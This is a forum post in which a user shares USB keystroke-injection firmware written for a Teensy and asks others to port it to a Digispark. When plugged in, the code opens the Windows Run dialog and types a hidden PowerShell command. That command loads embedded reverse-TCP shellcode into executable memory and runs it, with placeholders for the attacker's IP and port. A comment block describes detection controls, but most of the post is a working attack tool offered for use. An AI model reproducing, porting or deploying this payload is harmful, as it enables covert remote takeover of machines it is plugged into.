The Digispark => Digispark Project Ideas => Topic started by: DullJellyfish on January 29, 2016, 10:33:00 am
Hi,
I have recently gotten a Digispark and found this code:
const unsigned int ledPin = 13; // My Teensy has the built-in LED on pin 13.
// One-shot entry point: configure the status LED, give a single 500 ms blink,
// then run the two phases in order (wait for the host, then inject keystrokes).
void setup()
{
    const unsigned int startupBlinkMs = 500;
    pinMode(ledPin, OUTPUT);
    digitalWrite(ledPin, HIGH);
    delay(startupBlinkMs);
    digitalWrite(ledPin, LOW);
    hurryUp();          // Block until the host's keyboard driver answers.
    spawnReverseTCP();  // Keystroke-injection phase.
}
// Nothing runs continuously; all work happens once in setup().
void loop()
{
}
// Block until the host's keyboard driver is up: keep tapping Caps Lock (with a
// 1 s LED blink between taps) until the LED state reported by the host differs
// from the state seen at entry, then tap once more to restore that state.
void hurryUp()
{
    const boolean stateAtEntry = capsCheck();
    for (;;)
    {
        if (capsCheck() != stateAtEntry)
        {
            break;  // The host acknowledged a toggle, so it is processing our reports.
        }
        returnCode(1, 500);
        hitCaps();
    }
    hitCaps();  // Undo the toggle that ended the loop.
}
// Report whether Caps Lock is lit: bit 1 (mask 2) of the keyboard LED bitmap.
boolean capsCheck()
{
    const unsigned int capsLockMask = 2;
    return (activeLEDs() & capsLockMask) != 0;
}
// Current keyboard LED bitmap as the USB keyboard stack exposes it in
// keyboard_leds (read-only here; the host sets it via the HID LED report).
unsigned int activeLEDs()
{
    const int leds = static_cast<int>(keyboard_leds);
    return leds;
}
// Blink the status LED numBlinks times; each blink is halfDelay ms on followed
// by halfDelay ms off. numBlinks == 0 returns immediately.
void returnCode(unsigned int numBlinks, unsigned int halfDelay)
{
    for (unsigned int blink = 0; blink != numBlinks; ++blink)
    {
        digitalWrite(ledPin, HIGH);
        delay(halfDelay);
        digitalWrite(ledPin, LOW);
        delay(halfDelay);
    }
}
// Tap Caps Lock once: press, hold for 100 ms, then release through clearKeys()
// (which adds its own 100 ms settle delay).
void hitCaps()
{
    const unsigned int holdMs = 100;
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    delay(holdMs);
    clearKeys();
}
// Release everything: zero the modifier and key slot 1, send the empty report,
// then wait 100 ms so the host sees the release before the next report.
void clearKeys()
{
    const unsigned int settleMs = 100;
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(settleMs);
}
// Ensure Caps Lock is off: tap it only when the host reports it lit.
void killCaps()
{
    if (!capsCheck())
    {
        return;
    }
    hitCaps();
}
// Keystroke-injection payload (the name says reverse TCP; the byte array is not
// decoded here). Visible sequence: make sure Caps Lock is off, open the Run
// dialog (Right GUI + R), start a small cmd.exe window, choose the SysWOW64
// PowerShell when that directory exists, then type one long
// "powershell -nop -w hidden -c ..." command that defines VirtualAlloc /
// CreateThread / memset through Add-Type, copies the embedded byte array into
// memory allocated with protection 0x40 and starts it on a new thread. The two
// bracketed placeholders inside the array are the remote IP and port.
//
// Defender notes (review): the observable chain on the host is a newly
// enumerated HID keyboard followed within seconds by cmd.exe spawning
// powershell.exe with -nop -w hidden and later -enc, and a script block that
// calls Add-Type with VirtualAlloc + CreateThread. PowerShell script-block
// logging, process-creation auditing on that parent/child chain, Constrained
// Language Mode (Add-Type is unavailable there), and USB device control / HID
// allow-listing are the controls that surface or stop it.
void spawnReverseTCP()
{
killCaps(); // Turn off Caps Lock if it's on.
returnCode(1, 100); // Keyboard is ready.
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // Open the Run dialog.
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
clearKeys();
delay(1000);
returnCode(1, 100); // Run is ready.
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=15 LINES=1"); // Start CMD small with dark text.
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
clearKeys();
delay(3000); // Give CMD some time to appear.
returnCode(1, 100); // CMD is ready.
// The next line sets the Powershell path based on our architecture.
Keyboard.println("if exist C:\\Windows\\SysWOW64 ( set PWRSHLXDD=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell) else ( set PWRSHLXDD=powershell )");
returnCode(1, 100); // Everything is ready.
/* * * * * * * * * * * *
* *
* Take the red pill. *
* *
* * * * * * * * * * * */
Keyboard.print("%PWRSHLXDD% -nop -w hidden -c \"$1 = '$c = ''");
Keyboard.print("[DllImport(\\\"kernel32.dll\\\")]public static ext");
Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS");
Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm");
Keyboard.print("port(\\\"kernel32.dll\\\")]public static extern In");
Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint ");
Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam");
Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl");
Keyboard.print("lImport(\\\"msvcrt.dll\\\")]public static extern I");
Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);''");
Keyboard.print(";$w = Add-Type -memberDefinition $c -Name \\\"Win3");
Keyboard.print("2\\\" -namespace Win32Functions -passthru;[Byte[]]");
Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,");
Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,");
Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,");
Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,");
Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,");
Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,");
Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,");
Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,");
Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,");
Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,");
Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,");
Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,");
Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,");
Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,");
Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,");
Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,");
Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,");
Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,");
Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,");
Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,");
// Replace [0x@@,0x@@,0x@@,0x@@] with each part of your IP (in hex).
// Replace [0x@@,0x@@] with your open port (e.g. 65535 = 0xFF,0xFF)
// Don't forget to remove the [] brackets after editing.
Keyboard.print("[0x@@,0x@@,0x@@,0x@@],0x68,0x02,0x00,[0x@@,0x@@],0");
// MAKE SURE YOU DELETE THE BRACKETS.
// DO NOT PASS GO UNTIL YOU DELETE THE BRACKETS.
Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0");
Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0");
Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0");
Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0");
Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0");
Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0");
Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0");
Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0");
Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -");
Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc");
Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length");
Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $");
Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;");
Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase");
Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes(");
Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo");
Keyboard.print("ot + \\\"\\\\syswow64\\\\WindowsPowerShell\\\\v1.0");
Keyboard.print("\\\\powershell\\\";$cmd = \\\"-nop -noni -enc \\\"");
Keyboard.print(";iex \\\" $x86 $cmd $gq\\\"}else{$cmd = \\\"-nop -");
Keyboard.print("noni -enc\\\";iex \\\" powershell $cmd $gq\\\";}\"");
clearKeys();
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now(); // Send the command.
delay(100);
clearKeys();
returnCode(1, 1000); // All done.
}
I have tried to make it work on the Digispark, but without success...
I thought maybe someone here could get it to work :)
Thanks in advance!
DJ